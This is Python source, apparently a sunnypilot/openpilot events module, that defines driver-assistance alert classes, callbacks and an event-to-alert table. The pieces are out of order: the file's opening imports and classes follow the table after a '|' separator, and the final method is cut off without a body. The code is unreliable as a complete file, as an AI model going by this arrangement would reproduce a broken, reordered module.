    self.creation_delay = creation_delay
    # Filled in by Events.create_alerts().
    self.alert_type = ""
    self.event_type = None

  def __str__(self) -> str:
    return f"{self.alert_text_1}/{self.alert_text_2} {self.priority} {self.visual_alert} {self.audible_alert}"

  def __gt__(self, alert2) -> bool:
    # Alerts are ordered by priority only.
    return self.priority > alert2.priority
class NoEntryAlert(Alert):
  """Mid-size 'openpilot Unavailable' alert shown when engagement is refused."""
  def __init__(self, alert_text_2, visual_alert=VisualAlert.none):
    super().__init__(alert_text_1="openpilot Unavailable",
                     alert_text_2=alert_text_2,
                     alert_status=AlertStatus.normal,
                     alert_size=AlertSize.mid,
                     priority=Priority.LOW,
                     visual_alert=visual_alert,
                     audible_alert=AudibleAlert.refuse,
                     duration=3.)
class SoftDisableAlert(Alert):
  """Full-screen 'TAKE CONTROL IMMEDIATELY' alert shown during a soft disable."""
  def __init__(self, alert_text_2):
    # FIX: removed the stray trailing comma after the super().__init__ call;
    # it turned the statement into a discarded one-element tuple.
    super().__init__("TAKE CONTROL IMMEDIATELY", alert_text_2,
                     AlertStatus.userPrompt, AlertSize.full,
                     Priority.MID, VisualAlert.steerRequired,
                     AudibleAlert.warningSoft, 2.)
# less harsh version of SoftDisable, where the condition is user-triggered
class UserSoftDisableAlert(SoftDisableAlert):
  """Soft-disable alert for user-triggered conditions; softer headline text."""
  def __init__(self, alert_text_2):
    # FIX: removed stray trailing comma (it created a discarded tuple).
    super().__init__(alert_text_2)
    self.alert_text_1 = "openpilot will disengage"
class ImmediateDisableAlert(Alert):
  """Critical full-screen alert used when controls must disengage right away."""
  def __init__(self, alert_text_2):
    # FIX: removed stray trailing comma after the call (discarded tuple).
    super().__init__("TAKE CONTROL IMMEDIATELY", alert_text_2,
                     AlertStatus.critical, AlertSize.full,
                     Priority.HIGHEST, VisualAlert.steerRequired,
                     AudibleAlert.warningImmediate, 4.)
class EngagementAlert(Alert):
  """Invisible, sound-only alert played on engage/disengage."""
  def __init__(self, audible_alert: car.CarControl.HUDControl.AudibleAlert):
    # FIX: removed stray trailing comma after the call (discarded tuple).
    super().__init__("", "",
                     AlertStatus.normal, AlertSize.none,
                     Priority.MID, VisualAlert.none,
                     audible_alert, .2)
class NormalPermanentAlert(Alert):
  """Persistent low-priority alert; mid size when a subtitle is given, small otherwise."""
  def __init__(self, alert_text_1: str, alert_text_2: str = "", duration: float = 0.2, priority: Priority = Priority.LOWER, creation_delay: float = 0.):
    # FIX: removed stray trailing comma after the call (discarded tuple).
    super().__init__(alert_text_1, alert_text_2,
                     AlertStatus.normal, AlertSize.mid if len(alert_text_2) else AlertSize.small,
                     priority, VisualAlert.none, AudibleAlert.none, duration, creation_delay=creation_delay)
class StartupAlert(Alert):
  """Ten-second banner shown right after startup."""
  def __init__(self, alert_text_1: str, alert_text_2: str = "To use MADS, press the LFA or ACC MAIN button", alert_status=AlertStatus.normal):
    # FIX: removed stray trailing comma after the call (discarded tuple).
    super().__init__(alert_text_1, alert_text_2,
                     alert_status, AlertSize.mid,
                     Priority.LOWER, VisualAlert.none, AudibleAlert.none, 10.)
# ********** helper functions **********
def get_display_speed(speed_ms: float, metric: bool) -> str:
  """Format a speed in m/s as a rounded display string in local units."""
  factor = CV.MS_TO_KPH if metric else CV.MS_TO_MPH
  unit = 'km/h' if metric else 'mph'
  return f"{int(round(speed_ms * factor))} {unit}"
# ********** alert callback functions **********
# Signature shared by all alert factory callbacks below:
# (CP, sm, metric, soft_disable_time) -> Alert
AlertCallbackType = Callable[[car.CarParams, messaging.SubMaster, bool, int], Alert]
def soft_disable_alert(alert_text_2: str) -> AlertCallbackType:
  """Build a callback that soft-disables, escalating to an immediate disable
  when less than half a second of soft-disable time remains."""
  def func(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
    if soft_disable_time >= int(0.5 / DT_CTRL):
      return SoftDisableAlert(alert_text_2)
    return ImmediateDisableAlert(alert_text_2)
  return func
def user_soft_disable_alert(alert_text_2: str) -> AlertCallbackType:
  """Like soft_disable_alert, but uses the softer user-triggered variant."""
  def func(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
    if soft_disable_time >= int(0.5 / DT_CTRL):
      return UserSoftDisableAlert(alert_text_2)
    return ImmediateDisableAlert(alert_text_2)
  return func
def below_engage_speed_alert(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
  # No-entry alert quoting the car's minimum engage speed in local units.
  return NoEntryAlert(f"Speed Below {get_display_speed(CP.minEnableSpeed, metric)}")
def below_steer_speed_alert(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
  # Warning shown while driving below the car's minimum steering speed.
  return Alert(
    f"Steer Unavailable Below {get_display_speed(CP.minSteerSpeed, metric)}",
    "",
    AlertStatus.userPrompt, AlertSize.small,
    Priority.MID, VisualAlert.steerRequired, AudibleAlert.prompt, 0.4)
def calibration_incomplete_alert(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
  """Progress alert shown while camera calibration is still running."""
  return Alert(
    # f-string instead of %-formatting for consistency with the rest of the
    # file; int() matches %d's truncation of a float calPerc.
    f"Calibration in Progress: {int(sm['liveCalibration'].calPerc)}%",
    f"Drive Above {get_display_speed(MIN_SPEED_FILTER, metric)}",
    AlertStatus.normal, AlertSize.mid,
    Priority.LOWEST, VisualAlert.none, AudibleAlert.none, .2)
def no_gps_alert(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
  """Long-delay alert for persistently poor GPS reception."""
  # Integrated GPS (uno/dos hardware) -> antenna-placement advice is moot.
  gps_integrated = sm['peripheralState'].pandaType in [log.PandaState.PandaType.uno, log.PandaState.PandaType.dos]
  if gps_integrated:
    advice = "If sky is visible, contact support"
  else:
    advice = "Check GPS antenna placement"
  return Alert(
    "Poor GPS reception",
    advice,
    AlertStatus.normal, AlertSize.mid,
    Priority.LOWER, VisualAlert.none, AudibleAlert.none, .2, creation_delay=300.)
def wrong_car_mode_alert(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
  """No-entry alert when the car's main cruise switch is off."""
  # Honda uses different wording for the same condition.
  text = "Main Switch Off" if CP.carName == "honda" else "Cruise Mode Disabled"
  return NoEntryAlert(text)
def joystick_alert(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
  """Permanent alert echoing the current joystick gas/steer commands."""
  axes = sm['testJoystick'].axes
  gb, steer = (0., 0.) if not len(axes) else list(axes)[:2]
  readout = f"Gas: {round(gb * 100.)}%, Steer: {round(steer * 100.)}%"
  return NormalPermanentAlert("Joystick Mode", readout)
def speed_limit_adjust_alert(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
  """Alert shown while cruise speed is being adjusted to the posted speed limit."""
  speedLimit = sm['longitudinalPlan'].speedLimit
  speed = round(speedLimit * (CV.MS_TO_KPH if metric else CV.MS_TO_MPH))
  # BUGFIX: use double quotes inside the single-quoted f-string — reusing the
  # outer quote character is a SyntaxError on Python < 3.12 (PEP 701).
  message = f'Adjusting to {speed} {"km/h" if metric else "mph"} speed limit'
  return Alert(
    message,
    "",
    AlertStatus.normal, AlertSize.small,
    Priority.LOW, VisualAlert.none, AudibleAlert.none, 4.)
EVENTS: Dict[int, Dict[str, Union[Alert, AlertCallbackType]]] = {
# ********** events with no alerts **********
EventName.stockFcw: {},
# ********** events only containing alerts displayed in all states **********
EventName.joystickDebug: {
ET.WARNING: joystick_alert,
ET.PERMANENT: NormalPermanentAlert("Joystick Mode"),
},
EventName.controlsInitializing: {
ET.NO_ENTRY: NoEntryAlert("System Initializing"),
},
EventName.startup: {
ET.PERMANENT: StartupAlert("sunnypilot Initialized")
},
EventName.startupMaster: {
ET.PERMANENT: StartupAlert("WARNING: This branch is not tested",
alert_status=AlertStatus.userPrompt),
},
# Car is recognized, but marked as dashcam only
EventName.startupNoControl: {
ET.PERMANENT: StartupAlert("Dashcam mode"),
},
# Car is not recognized
EventName.startupNoCar: {
ET.PERMANENT: StartupAlert("Dashcam mode for unsupported car"),
},
EventName.startupNoFw: {
ET.PERMANENT: StartupAlert("Car Unrecognized",
"Check comma power connections",
alert_status=AlertStatus.userPrompt),
},
EventName.dashcamMode: {
ET.PERMANENT: NormalPermanentAlert("Dashcam Mode",
priority=Priority.LOWEST),
},
EventName.invalidLkasSetting: {
ET.PERMANENT: NormalPermanentAlert("Stock LKAS is on",
"Turn off stock LKAS to engage"),
},
EventName.cruiseMismatch: {
#ET.PERMANENT: ImmediateDisableAlert("openpilot failed to cancel cruise"),
},
# Some features or cars are marked as community features. If openpilot
# detects the use of a community feature it switches to dashcam mode
# until these features are allowed using a toggle in settings.
EventName.communityFeatureDisallowed: {
ET.PERMANENT: NormalPermanentAlert("openpilot Unavailable",
"Enable Community Features in Settings"),
},
# openpilot doesn't recognize the car. This switches openpilot into a
# read-only mode. This can be solved by adding your fingerprint.
# See https://github.com/commaai/openpilot/wiki/Fingerprinting for more information
EventName.carUnrecognized: {
ET.PERMANENT: NormalPermanentAlert("Dashcam Mode",
"Car Unrecognized",
priority=Priority.LOWEST),
},
EventName.stockAeb: {
ET.PERMANENT: Alert(
"BRAKE!",
"Stock AEB: Risk of Collision",
AlertStatus.critical, AlertSize.full,
Priority.HIGHEST, VisualAlert.fcw, AudibleAlert.none, 2.),
ET.NO_ENTRY: NoEntryAlert("Stock AEB: Risk of Collision"),
},
EventName.fcw: {
ET.PERMANENT: Alert(
"BRAKE!",
"Risk of Collision",
AlertStatus.critical, AlertSize.full,
Priority.HIGHEST, VisualAlert.fcw, AudibleAlert.warningSoft, 2.),
},
EventName.ldw: {
ET.PERMANENT: Alert(
"Lane Departure Detected",
"",
AlertStatus.userPrompt, AlertSize.small,
Priority.LOW, VisualAlert.ldw, AudibleAlert.prompt, 3.),
},
# ********** events only containing alerts that display while engaged **********
EventName.gasPressed: {
ET.PRE_ENABLE: Alert(
"Release Gas Pedal to Engage",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOWEST, VisualAlert.none, AudibleAlert.none, .1, creation_delay=1.),
},
# openpilot tries to learn certain parameters about your car by observing
# how the car behaves to steering inputs from both human and openpilot driving.
# This includes:
# - steer ratio: gear ratio of the steering rack. Steering angle divided by tire angle
# - tire stiffness: how much grip your tires have
# - angle offset: most steering angle sensors are offset and measure a non zero angle when driving straight
# This alert is thrown when any of these values exceed a sanity check. This can be caused by
# bad alignment or bad sensor data. If this happens consistently consider creating an issue on GitHub
EventName.vehicleModelInvalid: {
ET.NO_ENTRY: NoEntryAlert("Vehicle Parameter Identification Failed"),
ET.SOFT_DISABLE: soft_disable_alert("Vehicle Parameter Identification Failed"),
},
EventName.steerTempUnavailableSilent: {
ET.WARNING: Alert(
"Steering Temporarily Unavailable",
"",
AlertStatus.userPrompt, AlertSize.small,
Priority.LOW, VisualAlert.steerRequired, AudibleAlert.prompt, 1.),
},
EventName.preDriverDistracted: {
ET.WARNING: Alert(
"Pay Attention",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOW, VisualAlert.none, AudibleAlert.none, .1),
},
EventName.promptDriverDistracted: {
ET.WARNING: Alert(
"Pay Attention",
"Driver Distracted",
AlertStatus.userPrompt, AlertSize.mid,
Priority.MID, VisualAlert.steerRequired, AudibleAlert.promptDistracted, .1),
},
EventName.driverDistracted: {
ET.WARNING: Alert(
"DISENGAGE IMMEDIATELY",
"Driver Distracted",
AlertStatus.critical, AlertSize.full,
Priority.HIGH, VisualAlert.steerRequired, AudibleAlert.warningImmediate, .1),
},
EventName.preDriverUnresponsive: {
ET.WARNING: Alert(
"Touch Steering Wheel: No Face Detected",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOW, VisualAlert.steerRequired, AudibleAlert.none, .1, alert_rate=0.75),
},
EventName.promptDriverUnresponsive: {
ET.WARNING: Alert(
"Touch Steering Wheel",
"Driver Unresponsive",
AlertStatus.userPrompt, AlertSize.mid,
Priority.MID, VisualAlert.steerRequired, AudibleAlert.promptDistracted, .1),
},
EventName.driverUnresponsive: {
ET.WARNING: Alert(
"DISENGAGE IMMEDIATELY",
"Driver Unresponsive",
AlertStatus.critical, AlertSize.full,
Priority.HIGH, VisualAlert.steerRequired, AudibleAlert.warningImmediate, .1),
},
EventName.preKeepHandsOnWheel: {
ET.WARNING: Alert(
"No hands on steering wheel detected",
"",
AlertStatus.userPrompt, AlertSize.small,
Priority.MID, VisualAlert.steerRequired, AudibleAlert.none, .1, alert_rate=0.75),
},
EventName.promptKeepHandsOnWheel: {
ET.WARNING: Alert(
"HANDS OFF STEERING WHEEL",
"Place hands on steering wheel",
AlertStatus.critical, AlertSize.mid,
Priority.MID, VisualAlert.steerRequired, AudibleAlert.promptDistracted, .1),
},
EventName.keepHandsOnWheel: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("Driver kept hands off sterring wheel"),
},
EventName.manualRestart: {
ET.WARNING: Alert(
"TAKE CONTROL",
"Resume Driving Manually",
AlertStatus.userPrompt, AlertSize.mid,
Priority.LOW, VisualAlert.none, AudibleAlert.none, .2),
},
EventName.resumeRequired: {
ET.WARNING: Alert(
"STOPPED",
"Press Resume to Go",
AlertStatus.userPrompt, AlertSize.mid,
Priority.LOW, VisualAlert.none, AudibleAlert.none, .2),
},
EventName.belowSteerSpeed: {
ET.WARNING: below_steer_speed_alert,
},
EventName.preLaneChangeLeft: {
ET.WARNING: Alert(
"Steer Left to Start Lane Change Once Safe",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOW, VisualAlert.none, AudibleAlert.none, .1, alert_rate=0.75),
},
EventName.preLaneChangeRight: {
ET.WARNING: Alert(
"Steer Right to Start Lane Change Once Safe",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOW, VisualAlert.none, AudibleAlert.none, .1, alert_rate=0.75),
},
EventName.laneChangeBlocked: {
ET.WARNING: Alert(
"Car Detected in Blindspot",
"",
AlertStatus.userPrompt, AlertSize.small,
Priority.LOW, VisualAlert.none, AudibleAlert.prompt, .1),
},
EventName.laneChange: {
ET.WARNING: Alert(
"Changing Lanes",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOW, VisualAlert.none, AudibleAlert.none, .1),
},
EventName.manualSteeringRequired: {
ET.WARNING: Alert(
"MADS is OFF",
"Manual Steering Required",
AlertStatus.normal, AlertSize.mid,
Priority.LOW, VisualAlert.none, AudibleAlert.disengage, 2.),
},
EventName.manualLongitudinalRequired: {
ET.WARNING: Alert(
"Smart/Adaptive Cruise Control is OFF",
"Manual Gas/Brakes Required",
AlertStatus.normal, AlertSize.mid,
Priority.LOW, VisualAlert.none, AudibleAlert.none, 2.),
},
EventName.steerSaturated: {
ET.WARNING: Alert(
"Take Control",
"Turn Exceeds Steering Limit",
AlertStatus.userPrompt, AlertSize.mid,
Priority.LOW, VisualAlert.steerRequired, AudibleAlert.promptRepeat, 1.),
},
# Thrown when the fan is driven at >50% but is not rotating
EventName.fanMalfunction: {
ET.PERMANENT: NormalPermanentAlert("Fan Malfunction", "Contact Support"),
},
# Camera is not outputting frames at a constant framerate
EventName.cameraMalfunction: {
ET.PERMANENT: NormalPermanentAlert("Camera Malfunction", "Contact Support"),
},
# Unused
EventName.gpsMalfunction: {
ET.PERMANENT: NormalPermanentAlert("GPS Malfunction", "Contact Support"),
},
# When the GPS position and localizer diverge the localizer is reset to the
# current GPS position. This alert is thrown when the localizer is reset
# more often than expected.
EventName.localizerMalfunction: {
ET.PERMANENT: NormalPermanentAlert("Sensor Malfunction", "Contact Support"),
},
EventName.speedLimitActive: {
ET.WARNING: Alert(
"Cruise set to speed limit",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOW, VisualAlert.none, AudibleAlert.none, 2.),
},
EventName.speedLimitValueChange: {
ET.WARNING: speed_limit_adjust_alert,
},
# ********** events that affect controls state transitions **********
EventName.pcmEnable: {
ET.ENABLE: EngagementAlert(AudibleAlert.engage),
},
EventName.buttonEnable: {
ET.ENABLE: EngagementAlert(AudibleAlert.engage),
},
EventName.silentButtonEnable: {
ET.ENABLE: Alert(
"",
"",
AlertStatus.normal, AlertSize.none,
Priority.MID, VisualAlert.none, AudibleAlert.none, .2),
},
EventName.pcmDisable: {
ET.USER_DISABLE: EngagementAlert(AudibleAlert.disengage),
},
EventName.buttonCancel: {
ET.USER_DISABLE: EngagementAlert(AudibleAlert.disengage),
},
EventName.brakeHold: {
ET.USER_DISABLE: EngagementAlert(AudibleAlert.disengage),
ET.NO_ENTRY: NoEntryAlert("Brake Hold Active"),
},
EventName.silentBrakeHold: {
ET.USER_DISABLE: Alert(
"",
"",
AlertStatus.normal, AlertSize.none,
Priority.MID, VisualAlert.none, AudibleAlert.none, .2),
ET.NO_ENTRY: NoEntryAlert("Brake Hold Active"),
},
EventName.parkBrake: {
ET.USER_DISABLE: EngagementAlert(AudibleAlert.disengage),
ET.NO_ENTRY: NoEntryAlert("Parking Brake Engaged"),
},
EventName.pedalPressed: {
ET.USER_DISABLE: EngagementAlert(AudibleAlert.disengage),
ET.NO_ENTRY: NoEntryAlert("Pedal Pressed",
visual_alert=VisualAlert.brakePressed),
},
EventName.silentPedalPressed: {
ET.USER_DISABLE: Alert(
"",
"",
AlertStatus.normal, AlertSize.none,
Priority.MID, VisualAlert.none, AudibleAlert.none, .2),
ET.NO_ENTRY: NoEntryAlert("Pedal Pressed During Attempt",
visual_alert=VisualAlert.brakePressed),
},
EventName.wrongCarMode: {
ET.USER_DISABLE: EngagementAlert(AudibleAlert.disengage),
ET.NO_ENTRY: wrong_car_mode_alert,
},
EventName.wrongCruiseMode: {
ET.USER_DISABLE: EngagementAlert(AudibleAlert.disengage),
ET.NO_ENTRY: NoEntryAlert("Adaptive Cruise Disabled"),
},
EventName.steerTempUnavailable: {
ET.SOFT_DISABLE: soft_disable_alert("Steering Temporarily Unavailable"),
ET.NO_ENTRY: NoEntryAlert("Steering Temporarily Unavailable"),
},
EventName.outOfSpace: {
ET.PERMANENT: NormalPermanentAlert("Out of Storage"),
ET.NO_ENTRY: NoEntryAlert("Out of Storage"),
},
EventName.belowEngageSpeed: {
ET.NO_ENTRY: below_engage_speed_alert,
},
EventName.sensorDataInvalid: {
ET.PERMANENT: Alert(
"No Data from Device Sensors",
"Reboot your Device",
AlertStatus.normal, AlertSize.mid,
Priority.LOWER, VisualAlert.none, AudibleAlert.none, .2, creation_delay=1.),
ET.NO_ENTRY: NoEntryAlert("No Data from Device Sensors"),
},
EventName.noGps: {
ET.PERMANENT: no_gps_alert,
},
EventName.soundsUnavailable: {
ET.PERMANENT: NormalPermanentAlert("Speaker not found", "Reboot your Device"),
ET.NO_ENTRY: NoEntryAlert("Speaker not found"),
},
EventName.tooDistracted: {
ET.NO_ENTRY: NoEntryAlert("Distraction Level Too High"),
},
EventName.overheat: {
ET.PERMANENT: NormalPermanentAlert("System Overheated"),
ET.SOFT_DISABLE: soft_disable_alert("System Overheated"),
ET.NO_ENTRY: NoEntryAlert("System Overheated"),
},
EventName.wrongGear: {
ET.SOFT_DISABLE: user_soft_disable_alert("Gear not D"),
ET.NO_ENTRY: NoEntryAlert("Gear not D"),
},
EventName.silentWrongGear: {
ET.SOFT_DISABLE: Alert(
"Gear not D",
"openpilot Unavailable",
AlertStatus.normal, AlertSize.mid,
Priority.LOW, VisualAlert.none, AudibleAlert.none, 0., 2., 3.),
ET.NO_ENTRY: Alert(
"Gear not D",
"openpilot Unavailable",
AlertStatus.normal, AlertSize.mid,
Priority.LOW, VisualAlert.none, AudibleAlert.none, 0., 2., 3.),
},
# This alert is thrown when the calibration angles are outside of the acceptable range.
# For example if the device is pointed too much to the left or the right.
# Usually this can only be solved by removing the mount from the windshield completely,
# and attaching while making sure the device is pointed straight forward and is level.
# See https://comma.ai/setup for more information
EventName.calibrationInvalid: {
ET.PERMANENT: NormalPermanentAlert("Calibration Invalid", "Remount Device and Recalibrate"),
ET.SOFT_DISABLE: soft_disable_alert("Calibration Invalid: Remount Device & Recalibrate"),
ET.NO_ENTRY: NoEntryAlert("Calibration Invalid: Remount Device & Recalibrate"),
},
EventName.calibrationIncomplete: {
ET.PERMANENT: calibration_incomplete_alert,
ET.SOFT_DISABLE: soft_disable_alert("Calibration in Progress"),
ET.NO_ENTRY: NoEntryAlert("Calibration in Progress"),
},
EventName.doorOpen: {
ET.SOFT_DISABLE: user_soft_disable_alert("Door Open"),
ET.NO_ENTRY: NoEntryAlert("Door Open"),
},
EventName.seatbeltNotLatched: {
ET.SOFT_DISABLE: user_soft_disable_alert("Seatbelt Unlatched"),
ET.NO_ENTRY: NoEntryAlert("Seatbelt Unlatched"),
},
EventName.espDisabled: {
ET.SOFT_DISABLE: soft_disable_alert("ESP Off"),
ET.NO_ENTRY: NoEntryAlert("ESP Off"),
},
EventName.lowBattery: {
ET.SOFT_DISABLE: soft_disable_alert("Low Battery"),
ET.NO_ENTRY: NoEntryAlert("Low Battery"),
},
# Different openpilot services communicate between each other at a certain
# interval. If communication does not follow the regular schedule this alert
# is thrown. This can mean a service crashed, did not broadcast a message for
# ten times the regular interval, or the average interval is more than 10% too high.
EventName.commIssue: {
ET.SOFT_DISABLE: soft_disable_alert("Communication Issue between Processes"),
ET.NO_ENTRY: NoEntryAlert("Communication Issue between Processes"),
},
# Thrown when manager detects a service exited unexpectedly while driving
EventName.processNotRunning: {
ET.NO_ENTRY: NoEntryAlert("System Malfunction: Reboot Your Device"),
},
EventName.radarFault: {
ET.SOFT_DISABLE: soft_disable_alert("Radar Error: Restart the Car"),
ET.NO_ENTRY: NoEntryAlert("Radar Error: Restart the Car"),
},
# Every frame from the camera should be processed by the model. If modeld
# is not processing frames fast enough they have to be dropped. This alert is
# thrown when over 20% of frames are dropped.
EventName.modeldLagging: {
ET.SOFT_DISABLE: soft_disable_alert("Driving model lagging"),
ET.NO_ENTRY: NoEntryAlert("Driving model lagging"),
},
# Besides predicting the path, lane lines and lead car data the model also
# predicts the current velocity and rotation speed of the car. If the model is
# very uncertain about the current velocity while the car is moving, this
# usually means the model has trouble understanding the scene. This is used
# as a heuristic to warn the driver.
EventName.posenetInvalid: {
ET.SOFT_DISABLE: soft_disable_alert("Model Output Uncertain"),
ET.NO_ENTRY: NoEntryAlert("Model Output Uncertain"),
},
# When the localizer detects an acceleration of more than 40 m/s^2 (~4G) we
# alert the driver the device might have fallen from the windshield.
EventName.deviceFalling: {
ET.SOFT_DISABLE: soft_disable_alert("Device Fell Off Mount"),
ET.NO_ENTRY: NoEntryAlert("Device Fell Off Mount"),
},
EventName.lowMemory: {
ET.SOFT_DISABLE: soft_disable_alert("Low Memory: Reboot Your Device"),
ET.PERMANENT: NormalPermanentAlert("Low Memory", "Reboot your Device"),
ET.NO_ENTRY: NoEntryAlert("Low Memory: Reboot Your Device"),
},
EventName.highCpuUsage: {
#ET.SOFT_DISABLE: soft_disable_alert("System Malfunction: Reboot Your Device"),
#ET.PERMANENT: NormalPermanentAlert("System Malfunction", "Reboot your Device"),
ET.NO_ENTRY: NoEntryAlert("System Malfunction: Reboot Your Device"),
},
EventName.accFaulted: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("Cruise Faulted"),
ET.PERMANENT: NormalPermanentAlert("Cruise Faulted", ""),
ET.NO_ENTRY: NoEntryAlert("Cruise Faulted"),
},
EventName.controlsMismatch: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("Controls Mismatch"),
},
EventName.roadCameraError: {
ET.PERMANENT: NormalPermanentAlert("Camera Error",
duration=1.,
creation_delay=30.),
},
EventName.driverCameraError: {
ET.PERMANENT: NormalPermanentAlert("Camera Error",
duration=1.,
creation_delay=30.),
},
EventName.wideRoadCameraError: {
ET.PERMANENT: NormalPermanentAlert("Camera Error",
duration=1.,
creation_delay=30.),
},
# Sometimes the USB stack on the device can get into a bad state
# causing the connection to the panda to be lost
EventName.usbError: {
ET.SOFT_DISABLE: soft_disable_alert("USB Error: Reboot Your Device"),
ET.PERMANENT: NormalPermanentAlert("USB Error: Reboot Your Device", ""),
ET.NO_ENTRY: NoEntryAlert("USB Error: Reboot Your Device"),
},
# This alert can be thrown for the following reasons:
# - No CAN data received at all
# - CAN data is received, but some message are not received at the right frequency
# If you're not writing a new car port, this is usually cause by faulty wiring
EventName.canError: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("CAN Error: Check Connections"),
ET.PERMANENT: Alert(
"CAN Error: Check Connections",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOW, VisualAlert.none, AudibleAlert.none, 1., creation_delay=1.),
ET.NO_ENTRY: NoEntryAlert("CAN Error: Check Connections"),
},
EventName.steerUnavailable: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("LKAS Fault: Restart the Car"),
ET.PERMANENT: NormalPermanentAlert("LKAS Fault: Restart the car to engage"),
ET.NO_ENTRY: NoEntryAlert("LKAS Fault: Restart the Car"),
},
EventName.brakeUnavailable: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("Cruise Fault: Restart the Car"),
ET.PERMANENT: NormalPermanentAlert("Cruise Fault: Restart the car to engage"),
ET.NO_ENTRY: NoEntryAlert("Cruise Fault: Restart the Car"),
},
EventName.reverseGear: {
ET.PERMANENT: Alert(
"Reverse\nGear",
"",
AlertStatus.normal, AlertSize.full,
Priority.LOWEST, VisualAlert.none, AudibleAlert.none, .2, creation_delay=0.5),
ET.USER_DISABLE: ImmediateDisableAlert("Reverse Gear"),
ET.NO_ENTRY: NoEntryAlert("Reverse Gear"),
},
# On cars that use stock ACC the car can decide to cancel ACC for various reasons.
# When this happens we can no long control the car so the user needs to be warned immediately.
EventName.cruiseDisabled: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("Cruise Is Off"),
},
# For planning the trajectory Model Predictive Control (MPC) is used. This is
# an optimization algorithm that is not guaranteed to find a feasible solution.
# If no solution is found or the solution has a very high cost this alert is thrown.
EventName.plannerError: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("Planner Solution Error"),
ET.NO_ENTRY: NoEntryAlert("Planner Solution Error"),
},
# When the relay in the harness box opens the CAN bus between the LKAS camera
# and the rest of the car is separated. When messages from the LKAS camera
# are received on the car side this usually means the relay hasn't opened correctly
# and this alert is thrown.
EventName.relayMalfunction: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("Harness Malfunction"),
ET.PERMANENT: NormalPermanentAlert("Harness Malfunction", "Check Hardware"),
ET.NO_ENTRY: NoEntryAlert("Harness Malfunction"),
},
EventName.noTarget: {
ET.IMMEDIATE_DISABLE: Alert(
"openpilot Canceled",
"No close lead car",
AlertStatus.normal, AlertSize.mid,
Priority.HIGH, VisualAlert.none, AudibleAlert.disengage, 3.),
ET.NO_ENTRY: NoEntryAlert("No Close Lead Car"),
},
EventName.speedTooLow: {
ET.IMMEDIATE_DISABLE: Alert(
"openpilot Canceled",
"Speed too low",
AlertStatus.normal, AlertSize.mid,
Priority.HIGH, VisualAlert.none, AudibleAlert.disengage, 3.),
},
# When the car is driving faster than most cars in the training data, the model outputs can be unpredictable.
EventName.speedTooHigh: {
ET.WARNING: Alert(
"Speed Too High",
"Model uncertain at this speed",
AlertStatus.userPrompt, AlertSize.mid,
Priority.HIGH, VisualAlert.steerRequired, AudibleAlert.promptRepeat, 4.),
ET.NO_ENTRY: NoEntryAlert("Slow down to engage"),
},
EventName.lowSpeedLockout: {
ET.PERMANENT: NormalPermanentAlert("Cruise Fault: Restart the car to engage"),
ET.NO_ENTRY: NoEntryAlert("Cruise Fault: Restart the Car"),
},
}
| from enum import IntEnum
from typing import Dict, Union, Callable
from cereal import log, car
import cereal.messaging as messaging
from common.realtime import DT_CTRL
from selfdrive.config import Conversions as CV
from selfdrive.locationd.calibrationd import MIN_SPEED_FILTER
AlertSize = log.ControlsState.AlertSize
AlertStatus = log.ControlsState.AlertStatus
VisualAlert = car.CarControl.HUDControl.VisualAlert
AudibleAlert = car.CarControl.HUDControl.AudibleAlert
EventName = car.CarEvent.EventName
# Alert priorities
class Priority(IntEnum):
  """Display priority of an alert.

  Higher values win when multiple alerts compete for the screen
  (see Alert.__gt__, which compares on this field).
  """
  LOWEST = 0
  LOWER = 1
  LOW = 2
  MID = 3
  HIGH = 4
  HIGHEST = 5
# Event types
class ET:
  """String tags classifying how an event affects the controls state machine.

  Each entry in the EVENTS table maps one or more of these tags to an Alert
  (or an alert-callback); Events.create_alerts filters events by these tags.
  """
  ENABLE = 'enable'
  PRE_ENABLE = 'preEnable'
  NO_ENTRY = 'noEntry'
  WARNING = 'warning'
  USER_DISABLE = 'userDisable'
  SOFT_DISABLE = 'softDisable'
  IMMEDIATE_DISABLE = 'immediateDisable'
  PERMANENT = 'permanent'
# get event name from enum
# Reverse mapping: enum value -> its string name (from the capnp schema's
# enumerants), used to build the "name/eventType" string in Events.create_alerts.
EVENT_NAME = {v: k for k, v in EventName.schema.enumerants.items()}
class Events:
  """Collects the events raised during one control cycle and turns them into alerts/messages."""

  def __init__(self):
    self.events = []
    self.static_events = []
    # per-event count of consecutive frames the event has been active
    self.events_prev = {name: 0 for name in EVENTS}

  @property
  def names(self):
    return self.events

  def __len__(self):
    return len(self.events)

  def add(self, event_name, static=False):
    """Add an event for this cycle; static events persist across clear()."""
    if static:
      self.static_events.append(event_name)
    self.events.append(event_name)

  def clear(self):
    """Reset for the next cycle, keeping static events and the activity counters."""
    was_active = set(self.events)
    self.events_prev = {name: cnt + 1 if name in was_active else 0
                        for name, cnt in self.events_prev.items()}
    self.events = list(self.static_events)

  def any(self, event_type):
    """Return True if any current event carries the given event-type tag."""
